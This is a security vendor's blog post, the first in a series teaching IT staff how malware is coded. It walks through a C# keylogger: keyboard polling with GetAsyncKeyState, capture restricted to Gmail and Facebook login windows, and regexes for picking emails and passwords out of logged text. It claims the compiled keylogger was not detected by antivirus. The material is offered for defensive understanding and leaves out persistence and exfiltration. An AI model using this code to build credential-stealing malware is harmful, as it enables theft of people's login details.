This article is part of the series "Malware Coding Lessons for IT People". Check out the rest:
The world of hacking is roughly divided into three different categories of attackers:
- The “Skids” (Script kiddies) – beginning hackers who gather existing code samples and tools for their own use and create some basic malware.
- The “Buyers” – hackpreneurs, teenagers, and other thrill seekers who purchase malware coding services in the cloud, collect PII, and then perhaps resell the stolen personal data over the black market.
- The “Blackhat coders”- malware wizards who code new malware and work out exploits from scratch.
Can anyone with good software skills get to the level of “Blackhat coder”? No, you’re not going to be creating something like regin after attending a few DEFCON conference sessions.
Get the Free Pentesting Active
Directory Environments e-book
On the other hand, I really believe that an IT security person should master some of the programming concepts that go into malware.
Why Should an IT Person Learn These Dark Skills?
File that under “know your enemy”. As Inside Out blog has been pointing out, you have to think like a hacker to stop one. I’m an infosec specialist at Varonis and in my experience, you’ll be better at data security once you understand how the offense plays its game.
And that’s the reason I decided to start this series of posts on the details underlying malware and different hacking tool families. Once you understand how relatively simple it is to create undetectable malware, you’ll want to take a different approach to data security at your organization. More on that later.
I won’t be getting too technical, so don’t get scared off.
For these informal “hacking 101 classes”, you’ll need coding knowledge — C# and Java — and some understanding of Windows. Keep in mind that most real-world malware tools are coded in C/C++/Delphi in order to discard the dependency of .NET framework when coding with C#.
I also like using C# in my coding examples since it can be read like a story even if one isn’t familiar with the syntax.
Keyloggers for IT People
A keylogger is a piece of a software or hardware that can intercepting and record the keystrokes of a compromised machine. Think of it as digital tap that captures every keystroke from the keyboard.
Often the keylogger function is embedded in another piece of malware. Andy has already written about how keyloggers are typically part of Remote Access Trojans or RATS, which also provide stealthy ways to get the logged keystrokes back to the attacker.
There are hardware/fimware keyloggers, but they’re less common since they require physical access to the machine or directly tampering with the hardware.
However, the key logger function is fairly easy to code. So let’s break it down now. But first a few warnings to make our lawyers happy.
If you’re going to try some of this on your own in a business environment, make sure to get permission and perhaps work your tests in a separate VM.
Next, the examples below will not compile on their own. I’m just showing you the bits of code that perform the desired action — it’s not the most elegant or best way to do it.
Finally, I will not be showing you how to make the keylogger persistent so that it survives a reboot, or will I show how to make it avoid detection through using special coding techniques. I don’t want to go too far into the dark side. Let’s just say malware in the wild is good at being resistant to removal even if you manage to detect it.
Let’s dive into the code.
To hook into the keyboard, all you have to do is use these two C# lines:
[DllImport("user32.dll")] public static extern int GetAsyncKeyState(Int32 i);
- [DllImport("user32.dll")]
- public static extern int GetAsyncKeyState(Int32 i);
[DllImport("user32.dll")] public static extern int GetAsyncKeyState(Int32 i);
You can read more about the GetAsyncKeyState
API from MSDN:
https://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx
Summing up these two lines of code in one sentence: it determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState
.
Now you continually call this function to get the keyboard data you need:
while (true) { Thread.Sleep(100); for (Int32 i = 0; i < 255; i++) { int state = GetAsyncKeyState(i); if (state == 1 || state == -32767) { Console.WriteLine((Keys)i); } } }
- while (true)
- {
- Thread.Sleep(100);
- for (Int32 i = 0; i < 255; i++)
- {
- int state = GetAsyncKeyState(i);
- if (state == 1 || state == -32767)
- {
- Console.WriteLine((Keys)i);
- }
- }
- }
while (true) { Thread.Sleep(100); for (Int32 i = 0; i < 255; i++) { int state = GetAsyncKeyState(i); if (state == 1 || state == -32767) { Console.WriteLine((Keys)i); } } }
What’s going on here?
The loop will poll the keyboard every 100 milliseconds to detect the state of each key.
If one of them is pressed (or has been pressed), it will print it out to the console. In a real keylogger, the keystrokes would be buffered and then stealthily transmitted back to the hacker.
Smarter Keylogging
But wait, wouldn’t it make sense to zero in on a key stream going to a single app?
The above code pulls in the raw keyboard input from whatever window and input box that currently has the focus. If the goal of your hacking is to get passwords or credit card numbers, this approach is not very efficient.
It would get even harder if the keylogger were running on thousands of computers — this isn’t unheard of in the real world — and sending the results back to the hackers command center. A hacker would have a very difficult time parsing the stream to find the valuable information.
For the sake of argument, let’s assume what I really want to do is steal Facebook or Gmail credentials and use them to sell “Likes”.
Here’s the new idea: activate the keylogging method only when a browser is active, and the title of the web page contains the word “Facebook” or “Gmail”.
By using this method of limiting the input to browsers, I increase my chances of spotting user names and passwords.
Here’s my second version of the code:
while (true) { IntPtr handle = GetForegroundWindow(); if (GetWindowText(handle, buff, chars) > 0) { string line = buff.ToString(); if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up ")) { //Check keyboard } } Thread.Sleep(100); }
- while (true)
- {
- IntPtr handle = GetForegroundWindow();
- if (GetWindowText(handle, buff, chars) > 0)
- {
- string line = buff.ToString();
- if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up "))
- {
- //Check keyboard
- }
- }
- Thread.Sleep(100);
- }
while (true) { IntPtr handle = GetForegroundWindow(); if (GetWindowText(handle, buff, chars) > 0) { string line = buff.ToString(); if (line.Contains("Gmail")|| line.Contains("Facebook - Log In or Sign Up ")) { //Check keyboard } } Thread.Sleep(100); }
This code snippet will probe the active window every 100ms. GetForegroundWindow
does the real heaving lifting . The title of the window will be returned in the “buff” variable, and the keyboard scanning code called if it contains the word “Facebook” or “Gmail.
You can learn more about this API at MSDN.
I’ve just ensured I will get the keystrokes only when the user is surfing within a browser, and only at the sites “Facebook” or “Gmail” login pages.
Even Smarter Keylogging
Let’s assume the hacker has been pulling the output from keyloggers using something like the code above. Suppose this is an ambitious hacker who has managed to infect tens or hundreds thousands of laptops. Result: a huge file with megabytes of text in which the good stuff, emails addresses and passwords, are hidden.
It’s a good time to now make the acquaintance of regular expressions or regex. It’s like a mini language for scanning patterns and matching against the pattern that we have defined.
You can read more about regexes here.
Here is an example of two regexes that would match the usernames and passwords from a wall of text:
//Identify Email ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$ //Identify Password (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])
- //Identify Email
- ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$
- //Identify Password
- (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])
//Identify Email ^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$ //Identify Password (?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])
The above regexes are meant to hint at what can be done with smart regex scanning.
With regex, I can search for social security numbers, credit card numbers, bank accounts, phone numbers, names, passwords — really anything that has a pattern can fall into a regex expression.
Admittedly it’s not the easiest thing to read. But regex is a programmer’s best friend — better than Red Bull!
Languages such as Java, C#, JavaSript and others have builtin regex functions in which you can insert the expression representing what you want match — the above cryptic code — and run it against the text containing the potential patterns.
For C#, the regex looks like:
Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$"); Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])"); string email = "Oded.awask@gmail.com"; string pass = "abcde3FG"; Match result = re.Match(email); Match result2 = re2.Match(pass);
- Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$");
- Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])");
- string email = "Oded.awask@gmail.com";
- string pass = "abcde3FG";
- Match result = re.Match(email);
- Match result2 = re2.Match(pass);
Regex re = new Regex(@"^[\w!#$%&'*+\-/=?\^_`{|}~]+(\.[\w!#$%&'*+\-/=?\^_`{|}~]+)*@((([\-\w]+\.)+[a-zA-Z]{2,4})|(([0-9]{1,3}\.){3}[0-9]{1,3}))$"); Regex re2 = new Regex(@"(?=^.{6,}$)(?=.*\d)(?=.*[a-zA-Z])"); string email = "Oded.awask@gmail.com"; string pass = "abcde3FG"; Match result = re.Match(email); Match result2 = re2.Match(pass);
The first regex (re
) will match any email addressed inside a wall of text.
The second regex (re2
) will match any password like patterns that are longer than six letters.
Free FUD
Back in my own lab, I used Visual Studio – you can use your favorite IDE — to code a malicious keylogger tool in under 30 minutes.
If I were a real hacker, I would define targets (i.e., banking sites, social sites, etc.) and then manipulate the code to fit my special needs. Of course, I’d also have to launch a phish mail campaign that has the exe embedded in a harmless looking invoice or other document.
The only question that’s left to answer: is it FUD??
I compiled my code, and then checked the exe against Virustotal. That’s a web tool that calculates the hash of the exe and compares against its database of known virus hashes. No surprisingly, Virustotal couldn’t find a match.
That’s the point! It’s easy for hackers to continually evolve and change their code so it’s always a few steps ahead of the scanners. If you can do your own coding, you’re almost guaranteed FUD.
The lesson for IT security is that virus scanners alone will not protect your organization.
Click here to see the complete analysis page at Virustotal.
In my next post, I’ll take on ransomware, and show you how easy it is to code a FUD version.
What should I do now?
Below are three ways you can continue your journey to reduce data risk at your company:
Schedule a demo with us to see Varonis in action. We'll personalize the session to your org's data security needs and answer any questions.
See a sample of our Data Risk Assessment and learn the risks that could be lingering in your environment. Varonis' DRA is completely free and offers a clear path to automated remediation.
Follow us on LinkedIn, YouTube, and X (Twitter) for bite-sized insights on all things data security, including DSPM, threat detection, AI security, and more.